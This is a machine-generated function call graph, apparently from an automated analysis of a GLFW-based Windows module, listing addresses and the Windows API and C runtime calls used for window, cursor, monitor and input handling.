6460b1d6 6 API calls 7371->7372 7373 6460b5e0 MoveWindow 7372->7373 7373->7363 7374->7369 7375 6460c426 ShowWindow 7390 6460183f 7391 6460ad78 TlsGetValue 7390->7391 7392 64601855 7391->7392 7393 64602ef4 6 API calls 7392->7393 7394 64601890 7392->7394 7393->7394 7403 64612000 GetModuleHandleW GetProcAddress 7412 64605c0b 7413 64605c27 GetMonitorInfoW 7412->7413 7415 6460a767 7413->7415 7416 64601410 7419 646013f0 7416->7419 7422 64611df0 7419->7422 7423 64611e02 _lock 7422->7423 7424 64601407 7422->7424 7425 64611e70 calloc 7423->7425 7426 64611e14 7423->7426 7425->7426 7427 64611e9f _unlock 7425->7427 7428 64611e40 realloc 7426->7428 7429 64611e1e _unlock 7426->7429 7427->7424 7428->7427 7430 64611e64 7428->7430 7429->7424 7430->7429 7431 64610c10 7432 64610c20 calloc 7431->7432 7433 64610c19 7431->7433 7434 64610c7b 7432->7434 7435 64610c3e EnterCriticalSection LeaveCriticalSection 7432->7435 7435->7434 7436 64603211 7437 6460321f 7436->7437 7438 6460323f 7437->7438 7439 6460ad78 TlsGetValue 7437->7439 7439->7438 7440 64605419 7441 64605440 7440->7441 7442 64605428 7440->7442 7444 6460af44 2 API calls 7441->7444 7443 64602ef4 6 API calls 7442->7443 7445 6460543c 7443->7445 7444->7445 7446 6460401e 7447 6460402c 7446->7447 7448 64604066 7447->7448 7449 64602ef4 6 API calls 7447->7449 7449->7448 7454 64603eea 7455 64603ef9 7454->7455 7456 64603f35 calloc 7455->7456 7457 64603f1f 7455->7457 7463 6460e173 7456->7463 7458 64602ef4 6 API calls 7457->7458 7461 64603f33 7458->7461 7462 64603f76 glfwDestroyCursor 7462->7461 7466 6460b26a GetDC CreateDIBSection ReleaseDC 7463->7466 7467 6460b359 7466->7467 7468 6460b36f CreateBitmap 7466->7468 7469 64608298 9 API calls 7467->7469 7470 6460b3d2 CreateIconIndirect DeleteObject DeleteObject 7468->7470 7471 6460b3ad 7468->7471 7472 64603f72 7469->7472 7470->7472 7476 6460b479 7470->7476 7473 64608298 9 API calls 7471->7473 7472->7461 7472->7462 7475 6460b3c1 DeleteObject 7473->7475 7475->7472 7477 64608298 9 API calls 7476->7477 7477->7472 7478 64603ceb 7480 64603cff 7478->7480 7479 64603d7b 7481 64602ef4 6 API calls 7479->7481 7480->7479 7483 64603db5 7480->7483 7482 64603db3 7481->7482 7487 6460cd0b GetActiveWindow 7483->7487 7485 64603dc3 7485->7482 7486 6460d093 ClientToScreen SetCursorPos 7485->7486 7487->7485 7488 6460deec 7489 6460def5 PeekMessageW 7488->7489 7490 6460df5a GetActiveWindow 7489->7490 7497 6460df28 7489->7497 7491 6460df68 GetPropW 7490->7491 7492 6460dfe9 7490->7492 7491->7492 7499 6460df81 7491->7499 7494 6460e054 7492->7494 7496 6460c043 GetClientRect 7492->7496 7493 6460df44 TranslateMessage DispatchMessageW 7493->7489 7495 6460df93 GetKeyState 7495->7499 7498 6460e00e 7496->7498 7497->7489 7497->7493 7498->7494 7502 6460d093 ClientToScreen SetCursorPos 7498->7502 7499->7492 7499->7495 7501 6460b019 7 API calls 7499->7501 7501->7499 7502->7494 7507 64606eef 7508 64606f05 7507->7508 7509 64606f4c 7508->7509 7510 64606bcb 14 API calls 7508->7510 7512 64602ef4 6 API calls 7509->7512 7511 64606f69 7510->7511 7511->7509 7513 64606f8a 7511->7513 7514 64606f8c 7511->7514 7512->7513 7515 64602ef4 6 API calls 7514->7515 7516 6460e4e8 7514->7516 7515->7516 7517 6460d6ef 7518 6460d70b TrackMouseEvent 7517->7518 7520 6460d750 7517->7520 7518->7520 7519 6460deb9 DefWindowProcW 7520->7519 7525 646020f2 7526 646020fe 7525->7526 7527 64602ef4 6 API calls 7526->7527 7528 64602153 7527->7528 7529 64605ef4 7530 64605f07 7529->7530 7531 64605f54 7530->7531 7532 64605f6c 7530->7532 7533 64602ef4 6 API calls 7531->7533 7534 64605f6a 7532->7534 7535 64605633 7 API calls 7532->7535 7533->7534 7535->7534 7546 6460f6fd 7547 6460f70e 7546->7547 7548 6460f811 7547->7548 7549 64602ef4 6 API calls 7547->7549 7550 6460f80b 7549->7550 7551 646106c3 7552 646106e2 7551->7552 7555 646106f6 7552->7555 7556 64610d20 7552->7556 7554 6461075c 7557 64610d31 7556->7557 7558 64610df0 7556->7558 7559 64610d33 7557->7559 7560 64610d58 7557->7560 7558->7554 7561 64610d37 7559->7561 7562 64610d88 7559->7562 7563 64610d40 7560->7563 7570 64610ba0 EnterCriticalSection 7560->7570 7561->7563 7564 64610d70 InitializeCriticalSection 7561->7564 7565 64610d96 7562->7565 7566 64610ba0 4 API calls 7562->7566 7563->7554 7564->7563 7565->7563 7568 64610dc1 DeleteCriticalSection 7565->7568 7569 64610db0 free 7565->7569 7566->7565 7568->7563 7569->7568 7569->7569 7571 64610bf5 LeaveCriticalSection 7570->7571 7573 64610bc1 7570->7573 7571->7563 7572 64610bd0 TlsGetValue GetLastError 7572->7573 7573->7571 7573->7572 7595 6460a2c9 GetMonitorInfoW 7596 6460a31c 7595->7596 7597 6460a303 wcscmp 7595->7597 7597->7596 7608 646094cb 7609 64609506 7608->7609 7610 64609526 7609->7610 7611 6460950d 7609->7611 7613 64609542 7610->7613 7616 64609606 calloc 7610->7616 7612 64602ef4 6 API calls 7611->7612 7615 64609521 7612->7615 7614 64602ef4 6 API calls 7613->7614 7614->7615 7617 6460966d 7616->7617 7618 64609674 7617->7618 7619 646096aa qsort WideCharToMultiByte 7617->7619 7622 64602ef4 6 API calls 7618->7622 7620 64609721 7619->7620 7621 64609757 memcmp 7619->7621 7623 64602ef4 6 API calls 7620->7623 7624 646097b7 sprintf 7621->7624 7625 6460977c sprintf 7621->7625 7626 64609688 free 7622->7626 7627 64609735 free 7623->7627 7628 64609840 7624->7628 7625->7628 7626->7615 7627->7615 7629 646036a2 14 API calls 7628->7629 7632 64609870 7629->7632 7632->7615 7633 64609884 free 7632->7633 7633->7615 7634 6460bacb RegisterRawInputDevices 7635 6460bb05 7634->7635 7636 6460bb19 7634->7636 7637 64608298 9 API calls 7635->7637 7637->7636 7638 646116cc 7639 646116d0 7638->7639 7640 64611c20 _errno 7639->7640 7641 646116fa 7640->7641 7642 64611930 7641->7642 7644 64611322 7641->7644 7643 64611950 _errno 7642->7643 7646 6461137a 7642->7646 7643->7646 7645 64611c20 _errno 7644->7645 7644->7646 7645->7646 7647 64601ed0 7648 64601ede 7647->7648 7649 6460ad78 TlsGetValue 7648->7649 7650 64601f04 7648->7650 7649->7650 7651 64602ef4 6 API calls 7650->7651 7653 64601f41 7650->7653 7652 64601f39 7651->7652 7654 646018d1 7655 646018e0 7654->7655 7656 646018f8 7654->7656 7657 64602ef4 6 API calls 7655->7657 7658 6460ad78 TlsGetValue 7656->7658 7659 646018f4 7657->7659 7658->7659 7660 646120d2 7661 646120f0 __setusermatherr 7660->7661 7675 646098db 7676 646098f2 7675->7676 7677 646098fb memcmp 7676->7677 7678 6460992a 7676->7678 7677->7676 7679 64609932 7677->7679 7681 64609317 7678->7681 7682 64609359 7681->7682 7683 646094c1 7682->7683 7684 64609364 calloc 7682->7684 7683->7679 7685 64609395 7684->7685 7686 6460939b free 7685->7686 7688 646093a8 7685->7688 7686->7683 7689 64609480 strstr 7688->7689 7690 646093b8 free 7688->7690 7689->7688 7689->7690 7690->7683 7691 646104a1 7692 646104b0 7691->7692 7693 646013f0 5 API calls 7692->7693 7694 646104e0 7693->7694 7699 6460d4a1 7700 6460b019 7 API calls 7699->7700 7701 6460d4bb 7700->7701 7702 6460d4e0 7701->7702 7703 6460d4c8 MapVirtualKeyW 7701->7703 7704 6460d4f6 GetMessageTime PeekMessageW 7702->7704 7706 6460d538 7702->7706 7703->7702 7704->7706 7705 6460deb9 DefWindowProcW 7706->7705 7711 64610ca8 7712 64610cb0 EnterCriticalSection 7711->7712 7713 64610cf0 LeaveCriticalSection 7712->7713 7714 64610cc9 7712->7714 7714->7713 7715 64610ce8 free 7714->7715 7715->7713 7734 6460c4b6 FlashWindow 7735 64602cb6 7736 64602cc8 7735->7736 7737 64602cf6 7736->7737 7738 64602ef4 6 API calls 7736->7738 7738->7737 7739 6460ceb6 7740 6460ceea SetWindowLongW SetLayeredWindowAttributes 7739->7740 7741 6460cf5c SetWindowLongW 7739->7741 7744 6460cf7f 7740->7744 7741->7744 7749 6460b6b7 GetWindowLongW 7750 6460b543 7749->7750 7751 6460b6ec GetClientRect 7750->7751 7759 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7751->7759 7753 6460b70f 7754 6460b713 GetDpiForWindow 7753->7754 7755 6460b756 7753->7755 7756 6460b735 7754->7756 7757 6460b75d AdjustWindowRectEx 7755->7757 7758 6460b779 ClientToScreen ClientToScreen SetWindowLongW SetWindowPos 7756->7758 7757->7758 7759->7753 7760 6460dab7 7761 6460b56d 7 API calls 7760->7761 7762 6460dad5 7761->7762 7763 646010bc 7764 646010c0 7763->7764 7765 646010e2 7764->7765 7766 646010c8 Sleep 7764->7766 7767 64601200 _amsg_exit 7765->7767 7768 646010f2 7765->7768 7766->7764 7769 646011b0 _initterm 7768->7769 7770 646010ff 7768->7770 7769->7770 7771 646011d8 _initterm 7770->7771 7772 6460110d 7770->7772 7771->7772 7777 64607283 7778 64607296 7777->7778 7779 646072b1 7778->7779 7780 64608298 9 API calls 7778->7780 7781 6460adb6 TlsSetValue 7779->7781 7780->7779 7782 64607300 7781->7782 7783 64610c85 7784 64610ca1 7783->7784 7785 64610cb0 EnterCriticalSection 7783->7785 7784->7785 7786 64610cf0 LeaveCriticalSection 7785->7786 7787 64610cc9 7785->7787 7787->7786 7788 64610ce8 free 7787->7788 7788->7786 7789 6460c085 7790 6460c0ae 7789->7790 7791 6460c09e 7789->7791 7801 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7790->7801 7792 6460c1a1 7791->7792 7794 6460b0a6 21 API calls 7791->7794 7794->7790 7795 6460c0df 7796 6460c0e3 GetDpiForWindow 7795->7796 7797 6460c12f 7795->7797 7799 6460c105 7796->7799 7798 6460c13f AdjustWindowRectEx 7797->7798 7800 6460c15b SetWindowPos 7798->7800 7799->7800 7800->7792 7801->7795 7806 64611a89 7807 64611a90 7806->7807 7808 64611bc0 7807->7808 7809 64611aa0 _errno 7807->7809 7810 64611aef 7809->7810 7811 64602c89 7812 64602cb5 7811->7812 7813 64602c97 7811->7813 7814 64602ef4 6 API calls 7813->7814 7815 64602cb1 7814->7815 7816 6461148b 7817 64611490 7816->7817 7818 64611c20 _errno 7817->7818 7819 6461153a 7817->7819 7821 64611428 7817->7821 7818->7819 7820 64611950 _errno 7819->7820 7819->7821 7820->7821 7822 6460548a 7824 6460549e 7822->7824 7823 646054d1 7825 64602ef4 6 API calls 7823->7825 7824->7823 7827 646054ee 7824->7827 7826 646054e9 7825->7826 7828 6460af44 2 API calls 7827->7828 7828->7826 7829 6460da8a 7830 6460da91 7829->7830 7831 6460da98 7829->7831 7833 6460b169 7830->7833 7834 6460b1c0 7833->7834 7835 6460b176 GetClientRect ClientToScreen ClientToScreen 7833->7835 7836 6460b1c7 ClipCursor 7834->7836 7835->7836 7836->7831 7837 64610e90 strlen 7838 64610f0a 7837->7838 7841 64610eaa 7837->7841 7839 64610f18 7840 64610ef2 strncmp 7840->7838 7840->7841 7841->7838 7841->7839 7841->7840 7843 64603893 7844 646038a9 7843->7844 7845 646038cf 7844->7845 7852 6460cfe6 GetCursorPos 7844->7852 7849 6460e0e4 7851 6460e10d 7849->7851 7856 6460b4a7 GetCursorPos 7849->7856 7853 6460392c 7852->7853 7854 6460d006 ScreenToClient 7852->7854 7853->7849 7855 6460cd0b GetActiveWindow 7853->7855 7854->7853 7855->7849 7857 6460b4c3 7856->7857 7858 6460b4c7 WindowFromPoint 7856->7858 7857->7851 7858->7857 7859 6460b4e4 GetClientRect ClientToScreen ClientToScreen PtInRect 7858->7859 7859->7857 7860 64606894 7861 646068aa _assert 7860->7861 7863 646068c7 7860->7863 7861->7863 7862 64602ef4 6 API calls 7864 6460692d 7862->7864 7863->7862 7863->7864 7865 64601098 7867 646010a0 7865->7867 7866 64601150 7867->7866 7868 646010e2 7867->7868 7869 646010c8 Sleep 7867->7869 7870 64601200 _amsg_exit 7868->7870 7871 646010f2 7868->7871 7869->7867 7872 646011b0 _initterm 7871->7872 7873 646010ff 7871->7873 7872->7873 7874 646011d8 _initterm 7873->7874 7875 6460110d 7873->7875 7874->7875 7876 6461069b 7877 646106a0 7876->7877 7878 64610d20 7 API calls 7877->7878 7879 646106b8 7878->7879 6748 6460309b 6749 646030b8 6748->6749 6754 646030ae 6748->6754 6767 64608848 KiUserCallbackDispatcher SystemParametersInfoW 6749->6767 6755 646030fa 6766 646030e4 6755->6766 6814 6460ace8 6755->6814 6758 6460ace8 10 API calls 6759 6460311a 6758->6759 6760 6460adb6 TlsSetValue 6759->6760 6759->6766 6761 64603137 6760->6761 6820 6460af44 6761->6820 6764 64603156 6764->6754 6765 64603160 glfwUpdateGamepadMappings 6764->6765 6765->6764 6765->6766 6824 64602d50 6766->6824 6768 646088b0 6767->6768 6769 646088c7 GetProcAddress 6768->6769 6800 646088ba 6768->6800 6770 646088ed 6769->6770 6773 64608904 7 API calls 6770->6773 6770->6800 6771 64608298 9 API calls 6772 646030e0 6771->6772 6772->6766 6811 6460adfc 6772->6811 6774 646089ab GetProcAddress 6773->6774 6775 646089bf 6773->6775 6774->6775 6776 646089d7 LoadLibraryA 6775->6776 6777 64608a19 LoadLibraryA 6775->6777 6776->6775 6778 646089ec GetProcAddress GetProcAddress 6776->6778 6779 64608a75 6777->6779 6780 64608a2f GetProcAddress GetProcAddress GetProcAddress 6777->6780 6778->6777 6781 64608ab8 6779->6781 6782 64608a8b GetProcAddress GetProcAddress 6779->6782 6780->6779 6783 64608ace GetProcAddress 6781->6783 6784 64608ae2 6781->6784 6782->6781 6783->6784 6845 64608533 6784->6845 6788 64608dc0 6789 64608dd3 6788->6789 6790 64608dc4 SetProcessDpiAwarenessContext 6788->6790 6865 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6789->6865 6792 64608df3 6790->6792 6851 6460bb1b GetModuleHandleW LoadCursorW GetModuleHandleW LoadImageW 6792->6851 6793 64608def 6793->6792 6866 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6793->6866 6797 64608e1f 6797->6792 6799 64608e23 SetProcessDPIAware 6797->6799 6798 64608e36 GetModuleHandleW CreateWindowExW 6798->6800 6801 64608ecc ShowWindow RegisterDeviceNotificationW 6798->6801 6799->6792 6800->6771 6802 64608f2f PeekMessageW 6801->6802 6803 64608f63 TranslateMessage DispatchMessageW 6802->6803 6804 64608f7f 6802->6804 6803->6802 6857 6460aef0 QueryPerformanceFrequency 6804->6857 6812 6460ae28 InitializeCriticalSection 6811->6812 6813 6460ae0b 6811->6813 6812->6755 6813->6812 6815 6460ad14 TlsAlloc 6814->6815 6816 6460acf7 6814->6816 6817 6460ad20 6815->6817 6819 6460310a 6815->6819 6816->6815 6818 64608298 9 API calls 6817->6818 6818->6819 6819->6758 6819->6766 6821 6460af53 QueryPerformanceCounter 6820->6821 6822 6460af68 timeGetTime 6820->6822 6823 64603146 glfwDefaultWindowHints 6821->6823 6822->6823 6823->6764 6825 64602d69 6824->6825 6826 64602d72 glfwDestroyWindow 6825->6826 6827 64602d7c 6825->6827 6826->6825 6828 64602d85 glfwDestroyCursor 6827->6828 6830 64602d8f 6827->6830 6828->6827 6829 64602dc1 free free 6877 64606a9c 6829->6877 6830->6829 6867 6460abc8 6830->6867 6870 64605774 6830->6870 6834 64602e03 6880 64608f9b 6834->6880 6836 64602e08 6837 64602e21 free 6836->6837 6838 64602e32 6836->6838 6837->6836 6907 6460ad49 6838->6907 6841 6460ad49 TlsFree 6842 64602e4c 6841->6842 6910 6460ae45 6842->6910 6848 64608575 6845->6848 6846 646086a3 6850 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6846->6850 6847 646085b0 MapVirtualKeyW 6847->6848 6848->6846 6848->6847 6849 6460864c WideCharToMultiByte 6848->6849 6849->6848 6850->6788 6852 6460bbc1 LoadImageW 6851->6852 6853 6460bbf8 RegisterClassExW 6851->6853 6852->6853 6854 6460bc11 6853->6854 6855 64608e2e 6853->6855 6856 64608298 9 API calls 6854->6856 6855->6772 6855->6798 6856->6855 6858 64608f84 6857->6858 6859 64609b0e 6858->6859 6860 64609b72 6859->6860 6861 64609b17 GetModuleHandleW 6859->6861 6860->6860 6862 64609b57 6861->6862 6862->6860 6863 64609b5e 6862->6863 6864 64602ef4 6 API calls 6863->6864 6864->6860 6865->6793 6866->6797 6868 6460ac03 CreateDCW SetDeviceGammaRamp DeleteDC 6867->6868 6869 6460abe9 6867->6869 6868->6830 6869->6868 6871 646057c2 6870->6871 6872 64605782 6870->6872 6871->6830 6913 64605737 free free free 6872->6913 6874 64605795 6914 64605737 free free free 6874->6914 6876 646057a0 free free 6876->6871 6878 64606aa5 FreeLibrary 6877->6878 6879 64606ab7 6877->6879 6878->6834 6879->6834 6881 64608fb4 6880->6881 6882 64608faa UnregisterDeviceNotification 6880->6882 6883 64608fc7 6881->6883 6884 64608fbd DestroyWindow 6881->6884 6882->6881 6915 6460bc2e GetModuleHandleW UnregisterClassW 6883->6915 6884->6883 6886 64608fcc SystemParametersInfoW free free 6916 646076c4 6886->6916 6888 64609014 6889 646021b5 FreeLibrary 6888->6889 6890 64609019 6889->6890 6919 64609957 6890->6919 6893 64609031 6895 64609044 6893->6895 6896 6460903a FreeLibrary 6893->6896 6894 64609027 FreeLibrary 6894->6893 6897 64609057 6895->6897 6898 6460904d FreeLibrary 6895->6898 6896->6895 6899 64609060 FreeLibrary 6897->6899 6900 6460906a 6897->6900 6898->6897 6899->6900 6901 64609073 FreeLibrary 6900->6901 6902 6460907d 6900->6902 6901->6902 6903 64609090 6902->6903 6904 64609086 FreeLibrary 6902->6904 6905 646090a3 6903->6905 6906 64609099 FreeLibrary 6903->6906 6904->6903 6905->6836 6906->6905 6908 64602e40 6907->6908 6909 6460ad59 TlsFree 6907->6909 6908->6841 6909->6908 6911 64602e58 6910->6911 6912 6460ae55 DeleteCriticalSection 6910->6912 6911->6754 6912->6911 6913->6874 6914->6876 6915->6886 6917 646076cd FreeLibrary 6916->6917 6918 646076df 6916->6918 6917->6888 6918->6888 6920 64609963 6919->6920 6922 6460901e 6920->6922 6923 646090cb 6920->6923 6922->6893 6922->6894 6924 646090f0 free 6923->6924 6925 646090db 6923->6925 6928 64603763 free free free free 6924->6928 6925->6924 6927 64609103 6927->6920 6928->6927 7880 6460cd61 IsZoomed 7885 6460d968 7886 6460d981 7885->7886 7887 6460deb9 DefWindowProcW 7885->7887 7890 6460d109 7886->7890 7891 6460d120 ClipCursor 7890->7891 7892 6460d11b 7890->7892 7900 6460d093 ClientToScreen SetCursorPos 7891->7900 7896 6460ba76 RegisterRawInputDevices 7892->7896 7895 6460d154 7897 6460bab0 7896->7897 7898 6460bac4 7896->7898 7899 64608298 9 API calls 7897->7899 7898->7891 7899->7898 7900->7895 6929 6460496f 6930 64604982 6929->6930 6931 646049a8 6930->6931 6955 646049ee 6930->6955 6933 64602ef4 6 API calls 6931->6933 6932 646049cd strcspn 6932->6955 6934 646049c2 6933->6934 6935 64604f3f 6934->6935 6936 64604a18 strcspn 6939 64604c38 6936->6939 6936->6955 6937 64604ef4 strspn 6938 64604a02 6937->6938 6938->6935 6964 6460330d 6938->6964 6941 64602ef4 6 API calls 6939->6941 6943 64604c4c 6941->6943 6942 64604c5a strcspn 6942->6939 6942->6955 6944 64604cc9 strlen strncmp 6944->6955 6945 64604e67 6957 64609f29 strcmp 6945->6957 6947 64604e2c strcspn strspn 6947->6955 6948 64604e0c strncmp 6948->6947 6948->6955 6952 64604ee6 6952->6937 6953 64604eae realloc 6953->6952 6954 64604f46 strtoul 6954->6955 6955->6932 6955->6936 6955->6937 6955->6938 6955->6939 6955->6942 6955->6944 6955->6945 6955->6947 6955->6948 6955->6954 6956 64604d7e strtoul strtoul 6955->6956 6956->6955 6958 64609f4b strncpy sprintf 6957->6958 6959 64604e9f 6957->6959 6958->6959 6960 646032ba 6959->6960 6963 646032d5 6960->6963 6961 64603301 6961->6952 6961->6953 6962 646032da strcmp 6962->6961 6962->6963 6963->6961 6963->6962 6965 646032ba strcmp 6964->6965 6966 64603320 6965->6966 6967 64602ef4 6 API calls 6966->6967 6968 646033a0 6966->6968 6967->6968 6968->6938 7944 6460d375 7945 6460deb9 DefWindowProcW 7944->7945 7946 6460d37d 7944->7946 7946->7945 7947 6460d39a 7946->7947 7949 6460d038 7946->7949 7947->7945 7950 6460cfe6 2 API calls 7949->7950 7951 6460d05e 7950->7951 7952 6460ba29 2 API calls 7951->7952 7953 6460d065 7952->7953 7954 646037ac 3 API calls 7953->7954 7955 6460d06d 7954->7955 7956 6460b169 4 API calls 7955->7956 7957 6460d074 7956->7957 7957->7947 7958 64601378 7959 64601342 7958->7959 7960 64601288 7959->7960 7962 64601020 7959->7962 7964 646010a0 7962->7964 7965 6460102e 7962->7965 7963 64601150 7963->7960 7964->7963 7968 646010e2 7964->7968 7971 646010c8 Sleep 7964->7971 7966 64601050 Sleep 7965->7966 7967 64601070 7965->7967 7977 6460108f 7965->7977 7966->7965 7969 64601160 7967->7969 7970 6460107e _amsg_exit 7967->7970 7973 64601200 _amsg_exit 7968->7973 7974 646010f2 7968->7974 7980 64611eb0 _lock _unlock 7969->7980 7970->7977 7971->7964 7973->7960 7975 646011b0 _initterm 7974->7975 7976 646010ff 7974->7976 7975->7976 7978 646011d8 _initterm 7976->7978 7979 6460110d 7976->7979 7977->7960 7978->7979 7979->7960 7981 64611f0d 7980->7981 7982 64611eef free 7980->7982 7981->7977 7982->7981 7984 6460197e 7985 646019a2 7984->7985 7987 64601991 7984->7987 7986 6460ad78 TlsGetValue 7985->7986 7986->7987 7988 64602ef4 6 API calls 7987->7988 7989 646019cc 7987->7989 7990 646019c6 7988->7990 7995 64602f44 7996 64602ff9 strcpy 7995->7996 7997 64603001 7996->7997 7998 6460306c strcpy 7997->7998 8000 6460ad78 TlsGetValue 7997->8000 7999 64603087 7998->7999 8001 6460301b 8000->8001 8001->7998 8002 64603021 calloc 8001->8002 8003 6460adb6 TlsSetValue 8002->8003 8004 64603047 8003->8004 8005 6460ae74 EnterCriticalSection 8004->8005 8006 64603053 8005->8006 8007 6460aeb2 LeaveCriticalSection 8006->8007 8007->7998 8008 6460cd46 IsWindowVisible 8009 64607147 8010 6460ad78 TlsGetValue 8009->8010 8011 6460715d 8010->8011 8012 646071a5 8011->8012 8016 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8011->8016 8014 64607185 8014->8012 8017 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8014->8017 8016->8014 8017->8012 8029 6460734b 8030 6460735e 8029->8030 8031 64607363 GetProcAddress 8030->8031 8032 64607377 8030->8032 8031->8032 8038 64602155 8039 64602165 8038->8039 8040 6460adb6 TlsSetValue 8038->8040 8040->8039 8041 64610d54 8042 64610d58 8041->8042 8043 64610d4a 8042->8043 8044 64610ba0 4 API calls 8042->8044 8044->8043 6969 6460d15f GetPropW 6970 6460d238 6969->6970 6971 6460d19e 6969->6971 6977 6460d2de 6970->6977 6982 6460d247 6970->6982 6972 6460d1c4 6971->6972 6973 6460d1a7 6971->6973 7043 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6972->7043 6974 6460d1b0 6973->6974 6975 6460d1ea 6973->6975 6978 6460deb9 DefWindowProcW 6974->6978 6979 6460d1ba 6974->6979 6981 6460d1f3 6975->6981 6997 6460d20f 6975->6997 6977->6978 6983 6460dc10 6977->6983 6984 6460d319 6977->6984 7031 6460a331 6979->7031 6980 6460d1d0 6980->6978 6990 6460d1d8 EnableNonClientDpiScaling 6980->6990 6981->6978 7021 6460998c 6981->7021 6982->6978 6987 6460d299 6982->6987 6988 6460dada 6982->6988 7012 6460d20a 6982->7012 6983->6978 7049 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6983->7049 6985 6460d33a 6984->6985 6986 6460d31b 6984->6986 6991 6460dbf9 6985->6991 6985->7012 6998 6460d2d9 6986->6998 6986->7012 7050 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6986->7050 6994 6460d2b4 6987->6994 6995 6460d29b 6987->6995 6988->6978 6993 6460dae4 6988->6993 6990->6978 6991->6998 7003 6460b89f 12 API calls 6991->7003 7048 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6993->7048 7005 64608533 2 API calls 6994->7005 6994->7012 6995->6978 6995->7012 7051 6460ba29 6995->7051 6996 6460d1bf 6996->6978 6997->6978 7044 64609eed 6997->7044 6999 6460dc29 6999->6978 7004 6460dc31 GetDpiForWindow 6999->7004 7003->6998 7008 6460dc67 7004->7008 7005->7012 7006 6460daf0 7009 6460daf9 GetDpiForWindow 7006->7009 7015 6460db0b 7006->7015 7014 6460dc70 AdjustWindowRectExForDpi 7008->7014 7009->7015 7010 6460dd1b 7010->7012 7013 6460dd1f SetWindowPos 7010->7013 7012->6978 7012->6998 7013->7012 7016 6460dc99 7014->7016 7017 6460b1d6 6 API calls 7015->7017 7018 6460dca2 AdjustWindowRectExForDpi 7016->7018 7020 6460db3f 7017->7020 7018->6998 7019 6460db81 MonitorFromWindow GetMonitorInfoW 7019->6998 7020->6998 7020->7019 7022 64609a10 7021->7022 7027 6460999f 7021->7027 7023 64609a50 7022->7023 7028 64609add 7022->7028 7024 64602ef4 6 API calls 7023->7024 7025 64609a64 7024->7025 7025->7028 7026 64609a88 sprintf 7026->7027 7026->7028 7027->7022 7027->7026 7027->7028 7030 646099ca 7027->7030 7028->7012 7030->7027 7056 646036a2 7030->7056 7032 6460a34e calloc 7031->7032 7041 6460a377 7031->7041 7032->7041 7033 6460a381 EnumDisplayDevicesW 7034 6460a53a 7033->7034 7033->7041 7035 6460a562 free 7034->7035 7063 646057c8 7034->7063 7035->6996 7036 6460a3eb EnumDisplayDevicesW 7036->7041 7038 6460a4dd wcscmp 7038->7041 7039 6460a451 wcscmp 7039->7041 7040 64609f84 34 API calls 7040->7041 7041->7033 7041->7035 7041->7036 7041->7038 7041->7039 7041->7040 7042 646057c8 48 API calls 7041->7042 7042->7041 7043->6980 7045 64609ef9 7044->7045 7047 64609f23 7045->7047 7128 64609b7b 7045->7128 7047->7012 7048->7006 7049->6999 7050->7010 7052 6460ba46 SetCursor 7051->7052 7053 6460ba3f 7051->7053 7052->7012 7053->7052 7054 6460ba4b LoadCursorW 7053->7054 7054->7052 7057 646036b3 7056->7057 7058 646036c5 7057->7058 7062 64602e69 strlen calloc strcpy 7057->7062 7058->7030 7060 646036e7 calloc calloc calloc strncpy 7061 6460330d 7 API calls 7060->7061 7061->7058 7062->7060 7064 646057e2 realloc 7063->7064 7065 6460583f 7063->7065 7066 64605810 memmove 7064->7066 7067 64605836 7064->7067 7065->7067 7068 6460c043 GetClientRect 7065->7068 7070 646058f1 7065->7070 7074 6460c9ba 7065->7074 7105 6460c2a3 7065->7105 7114 6460bf52 7065->7114 7066->7067 7067->7034 7068->7065 7069 64605912 memmove 7069->7067 7070->7067 7070->7069 7075 6460c9e6 7074->7075 7076 6460cadc 7074->7076 7077 6460c9fa 7075->7077 7080 6460cd03 7075->7080 7083 6460b0a6 21 API calls 7075->7083 7078 6460caea 7076->7078 7079 6460b80c 7 API calls 7076->7079 7122 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7077->7122 7085 6460cbc3 GetWindowLongW 7078->7085 7086 6460cb0c 7078->7086 7079->7078 7080->7065 7082 6460ca2b 7084 6460ca2f GetDpiForWindow 7082->7084 7093 6460ca7b 7082->7093 7083->7077 7103 6460ca51 7084->7103 7089 6460cc2f 7085->7089 7094 6460cbfd 7085->7094 7087 6460cb76 7086->7087 7088 6460cb2a GetWindowLongW 7086->7088 7092 6460b0a6 21 API calls 7087->7092 7123 6460b543 7088->7123 7125 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7089->7125 7097 6460cb7d GetMonitorInfoW 7092->7097 7101 6460ca8b AdjustWindowRectEx 7093->7101 7098 6460cc0f SetWindowLongW 7094->7098 7095 6460cc47 7099 6460cc4b GetDpiForWindow 7095->7099 7102 6460cc9a 7095->7102 7100 6460ccf1 SetWindowPos 7097->7100 7098->7089 7099->7103 7100->7080 7101->7103 7104 6460ccaa AdjustWindowRectEx 7102->7104 7103->7100 7104->7103 7106 6460c043 GetClientRect 7105->7106 7107 6460c2c8 SetRect 7106->7107 7126 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7107->7126 7109 6460c2fe 7110 6460c302 GetDpiForWindow 7109->7110 7111 6460c34e 7109->7111 7113 6460c324 7110->7113 7112 6460c35e AdjustWindowRectEx 7111->7112 7112->7113 7113->7065 7127 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7114->7127 7116 6460bf7f 7117 6460bf83 GetDpiForWindow 7116->7117 7118 6460bfcf 7116->7118 7119 6460bfa5 7117->7119 7120 6460bfdf AdjustWindowRectEx 7118->7120 7121 6460bffb SetWindowPos 7119->7121 7120->7121 7121->7065 7122->7082 7124 6460b550 SetWindowLongW 7123->7124 7124->7087 7125->7095 